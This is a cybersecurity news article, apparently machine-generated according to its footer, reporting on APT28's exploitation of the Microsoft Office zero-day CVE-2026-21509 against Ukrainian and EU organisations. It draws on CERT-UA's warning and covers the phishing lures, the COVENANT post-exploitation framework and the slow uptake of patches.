Today's cybersecurity headlines are brought to you by ThreatPerspective
Ethical Hacking News

Apt28 Attackers Exploit New Microsoft Office Zero-Day, Wreaking Havoc on Ukraine and EU Targeted Organizations


Apt28 Attackers Exploit New Microsoft Office Zero-Day, Wreaking Havoc on Ukraine and EU Targeted Organizations

Russia-linked attackers have already begun exploiting a newly discovered zero-day in Microsoft Office, with Ukraine's national cyber defense team warning that the same bug is being used to target government agencies inside the country and organizations across the EU. The APT28 group, also known as "Fancy Bear," has been linked to numerous high-profile attacks against government agencies, corporations, and other organizations across Europe and beyond.

  • Russia-linked attackers, driven by APT28 (Fancy Bear), have exploited Microsoft's latest Office zero-day, CVE-2026-21509.
  • A weaponized document was publicly available just days after Microsoft sounded the alarm about the flaw.
  • A phishing campaign impersonating official correspondence was also launched, targeting over 60 recipients in Ukraine and across the EU.
  • The attackers deployed the COVENANT post-exploitation framework to maintain persistence and establish a foothold.
  • CERT-UA warned that the number of cyberattacks using this vulnerability will increase due to the group's adaptability and the inertia of patching processes.
  • Microsoft has released patches for older Office builds, but CERT-UA is concerned about how quickly they will be adopted.



    • Microsoft's latest Office zero-day, CVE-2026-21509, has already been exploited by Russia-linked attackers, with the activity being driven by APT28, also known as "Fancy Bear." This attack is part of a larger campaign that has seen the use of malicious documents and phishing campaigns to target government agencies in Ukraine and organizations across the EU.

    According to an alert published by Ukraine's national cyber defense team, CERT-UA, the first weaponized document surfaced just days after Microsoft sounded the alarm about the flaw. A file titled "Consultation_Topics_Ukraine(Final).doc" appeared publicly on January 29, with metadata showing it was created on January 27 - the day after Microsoft published details of the flaw. This turnaround time suggests that the exploit chain was already prepared and waiting.

    Ukrainian incident responders were alerted to a parallel phishing campaign impersonating official correspondence from the Ukrhydrometeorological Center, with over 60 recipients receiving emails carrying a malicious DOC attachment. Opening the file in Office quietly initiates a WebDAV connection to an external server, downloads a shortcut file, and uses it as a launchpad for further malware.

    The attackers have now deployed the COVENANT post-exploitation framework, which routes its traffic through a legitimate cloud storage service, helping it blend in with everyday noise rather than something obviously hostile. This has allowed the attackers to maintain persistence and establish a foothold that they can return to.

    CERT-UA warned that, in the near future, including due to the inertia of the process or impossibility of users updating the Microsoft Office suite and/or using recommended protection mechanisms, the number of cyberattacks using this vulnerability will begin to increase. This prediction is based on the fact that the attackers were able to quickly exploit the zero-day and deploy their malicious framework.

    The APT28 group has previously been linked to numerous high-profile attacks against government agencies, corporations, and other organizations across Europe and beyond. The use of a new Microsoft Office zero-day by this group suggests that they are adapting their tactics to take advantage of newly available vulnerabilities and remain one step ahead of security measures.

    In an effort to mitigate the risk posed by this vulnerability, Microsoft has released patches for older Office builds that initially sat in limbo. However, CERT-UA is still not optimistic about how quickly these patches will land, given the inertia of the process or impossibility of users updating their software.

    The recent exploitation of CVE-2026-21509 serves as a stark reminder of the importance of staying vigilant and taking proactive measures to protect against emerging threats. It also highlights the need for organizations to regularly review and update their security protocols to prevent similar attacks in the future.

    In conclusion, the APT28 group's exploitation of Microsoft's latest Office zero-day marks a concerning development in the ongoing cat-and-mouse game between attackers and defenders. As more organizations become aware of this vulnerability, it is essential that they prioritize patching and take immediate action to protect themselves against potential attacks.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/Apt28-Attackers-Exploit-New-Microsoft-Office-Zero-Day-Wreaking-Havoc-on-Ukraine-and-EU-Targeted-Organizations-ehn.shtml

  • https://go.theregister.com/feed/www.theregister.com/2026/02/02/russialinked_apt28_microsoft_office_bug/

  • https://thecyberexpress.com/russian-apt28-exploit-zero-day-cve-2026-21509/

  • https://thehackernews.com/2025/05/russia-linked-apt28-exploited-mdaemon.html

  • https://attack.mitre.org/groups/G0007/

  • https://www.picussecurity.com/resource/blog/apt28-cyber-threat-profile-and-detailed-ttps


    • Published: Mon Feb 2 12:35:11 2026 by llama3.2 3B Q4_K_M


    © Ethical Hacking News . All rights reserved.

    Privacy | Terms of Use | Contact Us